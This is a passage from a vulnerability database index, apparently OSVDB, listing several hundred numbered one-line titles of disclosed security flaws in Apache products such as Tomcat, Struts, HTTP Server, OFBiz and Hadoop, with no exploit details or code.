16862| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
16863| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
16864| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
16865| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
16866| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
16867| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
16868| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
16869| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
16870| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
16871| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
16872| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
16873| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
16874| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
16875| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
16876| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
16877| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
16878| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
16879| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
16880| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
16881| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
16882| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
16883| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
16884| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
16885| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
16886| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
16887| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
16888| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
16889| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
16890| [86901] Apache Tomcat Error Message Path Disclosure
16891| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
16892| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
16893| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
16894| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
16895| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
16896| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
16897| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
16898| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
16899| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
16900| [85430] Apache mod_pagespeed Module Unspecified XSS
16901| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
16902| [85249] Apache Wicket Unspecified XSS
16903| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
16904| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
16905| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
16906| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
16907| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
16908| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
16909| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
16910| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
16911| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
16912| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
16913| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
16914| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
16915| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
16916| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
16917| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
16918| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
16919| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
16920| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
16921| [83339] Apache Roller Blogger Roll Unspecified XSS
16922| [83270] Apache Roller Unspecified Admin Action CSRF
16923| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
16924| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
16925| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
16926| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
16927| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
16928| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
16929| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
16930| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
16931| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
16932| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
16933| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
16934| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
16935| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
16936| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
16937| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
16938| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
16939| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
16940| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
16941| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
16942| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
16943| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
16944| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
16945| [80300] Apache Wicket wicket:pageMapName Parameter XSS
16946| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
16947| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
16948| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
16949| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
16950| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
16951| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
16952| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
16953| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
16954| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
16955| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
16956| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
16957| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
16958| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
16959| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
16960| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
16961| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
16962| [78331] Apache Tomcat Request Object Recycling Information Disclosure
16963| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
16964| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
16965| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
16966| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
16967| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
16968| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
16969| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
16970| [77593] Apache Struts Conversion Error OGNL Expression Injection
16971| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
16972| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
16973| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
16974| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
16975| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
16976| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
16977| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
16978| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
16979| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
16980| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
16981| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
16982| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
16983| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
16984| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
16985| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
16986| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
16987| [74725] Apache Wicket Multi Window Support Unspecified XSS
16988| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
16989| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
16990| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
16991| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
16992| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
16993| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
16994| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
16995| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
16996| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
16997| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
16998| [73644] Apache XML Security Signature Key Parsing Overflow DoS
16999| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
17000| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
17001| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
17002| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
17003| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
17004| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
17005| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
17006| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
17007| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
17008| [73154] Apache Archiva Multiple Unspecified CSRF
17009| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
17010| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
17011| [72238] Apache Struts Action / Method Names <
17012| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
17013| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
17014| [71557] Apache Tomcat HTML Manager Multiple XSS
17015| [71075] Apache Archiva User Management Page XSS
17016| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
17017| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
17018| [70924] Apache Continuum Multiple Admin Function CSRF
17019| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
17020| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
17021| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
17022| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
17023| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
17024| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
17025| [69520] Apache Archiva Administrator Credential Manipulation CSRF
17026| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
17027| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
17028| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
17029| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
17030| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
17031| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
17032| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
17033| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
17034| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
17035| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
17036| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
17037| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
17038| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
17039| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
17040| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
17041| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
17042| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
17043| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
17044| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
17045| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
17046| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
17047| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
17048| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
17049| [65054] Apache ActiveMQ Jetty Error Handler XSS
17050| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
17051| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
17052| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
17053| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
17054| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
17055| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
17056| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
17057| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
17058| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
17059| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
17060| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
17061| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
17062| [63895] Apache HTTP Server mod_headers Unspecified Issue
17063| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
17064| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
17065| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
17066| [63140] Apache Thrift Service Malformed Data Remote DoS
17067| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
17068| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
17069| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
17070| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
17071| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
17072| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
17073| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
17074| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
17075| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
17076| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
17077| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
17078| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
17079| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
17080| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
17081| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
17082| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
17083| [60678] Apache Roller Comment Email Notification Manipulation DoS
17084| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
17085| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
17086| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
17087| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
17088| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
17089| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
17090| [60232] PHP on Apache php.exe Direct Request Remote DoS
17091| [60176] Apache Tomcat Windows Installer Admin Default Password
17092| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
17093| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
17094| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
17095| [59944] Apache Hadoop jobhistory.jsp XSS
17096| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
17097| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
17098| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
17099| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
17100| [59019] Apache mod_python Cookie Salting Weakness
17101| [59018] Apache Harmony Error Message Handling Overflow
17102| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
17103| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
17104| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
17105| [59010] Apache Solr get-file.jsp XSS
17106| [59009] Apache Solr action.jsp XSS
17107| [59008] Apache Solr analysis.jsp XSS
17108| [59007] Apache Solr schema.jsp Multiple Parameter XSS
17109| [59006] Apache Beehive select / checkbox Tag XSS
17110| [59005] Apache Beehive jpfScopeID Global Parameter XSS
17111| [59004] Apache Beehive Error Message XSS
17112| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
17113| [59002] Apache Jetspeed default-page.psml URI XSS
17114| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
17115| [59000] Apache CXF Unsigned Message Policy Bypass
17116| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
17117| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
17118| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
17119| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
17120| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
17121| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
17122| [58993] Apache Hadoop browseBlock.jsp XSS
17123| [58991] Apache Hadoop browseDirectory.jsp XSS
17124| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
17125| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
17126| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
17127| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
17128| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
17129| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
17130| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
17131| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
17132| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
17133| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
17134| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
17135| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
17136| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
17137| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
17138| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
17139| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
17140| [58974] Apache Sling /apps Script User Session Management Access Weakness
17141| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
17142| [58931] Apache Geronimo Cookie Parameters Validation Weakness
17143| [58930] Apache Xalan-C++ XPath Handling Remote DoS
17144| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
17145| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
17146| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
17147| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
17148| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
17149| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
17150| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
17151| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
17152| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
17153| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
17154| [58805] Apache Derby Unauthenticated Database / Admin Access
17155| [58804] Apache Wicket Header Contribution Unspecified Issue
17156| [58803] Apache Wicket Session Fixation
17157| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
17158| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
17159| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
17160| [58799] Apache Tapestry Logging Cleartext Password Disclosure
17161| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
17162| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
17163| [58796] Apache Jetspeed Unsalted Password Storage Weakness
17164| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
17165| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
17166| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
17167| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
17168| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
17169| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
17170| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
17171| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
17172| [58775] Apache JSPWiki preview.jsp action Parameter XSS
17173| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
17174| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
17175| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
17176| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
17177| [58770] Apache JSPWiki Group.jsp group Parameter XSS
17178| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
17179| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
17180| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
17181| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
17182| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
17183| [58763] Apache JSPWiki Include Tag Multiple Script XSS
17184| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
17185| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
17186| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
17187| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
17188| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
17189| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
17190| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
17191| [58755] Apache Harmony DRLVM Non-public Class Member Access
17192| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
17193| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
17194| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
17195| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
17196| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
17197| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
17198| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
17199| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
17200| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
17201| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
17202| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
17203| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
17204| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
17205| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
17206| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
17207| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
17208| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
17209| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
17210| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
17211| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
17212| [58725] Apache Tapestry Basic String ACL Bypass Weakness
17213| [58724] Apache Roller Logout Functionality Failure Session Persistence
17214| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
17215| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
17216| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
17217| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
17218| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
17219| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
17220| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
17221| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
17222| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
17223| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
17224| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
17225| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
17226| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
17227| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
17228| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
17229| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
17230| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
